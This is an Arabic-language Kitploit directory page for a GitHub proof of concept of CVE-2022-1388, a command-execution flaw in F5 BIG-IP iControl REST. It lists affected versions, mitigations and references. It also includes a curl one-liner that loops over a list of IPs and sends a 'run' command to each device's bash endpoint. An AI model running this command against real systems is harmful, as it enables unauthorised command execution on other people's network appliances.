Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1388 — PoC لثغرة BIG-IP iControl REST CVE-2022-1388 | Kitploit
أدوات/GitHubGitHub/shamo0/cve-2022-1388
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubshamo0/cve-2022-1388

CVE-2022-1388

PoC لثغرة BIG-IP iControl REST CVE-2022-1388

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لثغرة BIG-IP iControl REST CVE-2022-1388

f5logo

قد تسمح هذه الثغرة لمهاجم غير مصادق لديه وصول إلى الشبكة في نظام BIG-IP عبر منفذ الإدارة و/أو عناوين IP الذاتية بتنفيذ أوامر نظام تعسفية، أو إنشاء ملفات أو حذفها، أو تعطيل الخدمات.

إثبات المفهوم

يمكنك استخدام أمر curl التالي في سطر واحد للتحقق من ثغرة F5 Big-IP أو استخدام سكربت بايثون المرفق.

root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

الإصدارات المعرضة للثغرة (Big-IP)

الفرعالإصدارات المعرضةالإصلاحات المقدمة
11.x11.6.1-11.6.5لا يوجد إصلاح
12.x12.1.0-12.1.6لا يوجد إصلاح
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xلا يوجد17.0.0

التخفيف

  • قم بالترقية إلى الإصدار المُصلَح في عمود ```Fixes Introduced```. (الطريقة المفضلة)
  • احظر الوصول إلى iControl REST عبر عنوان IP الذاتي
  • احظر الوصول إلى iControl REST عبر واجهة الإدارة
  • عدّل تكوين httpd الخاص بـ BIG-IP

لمزيد من المعلومات حول التخفيف، راجع المراجع.

المراجع

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
تنزيل الأداة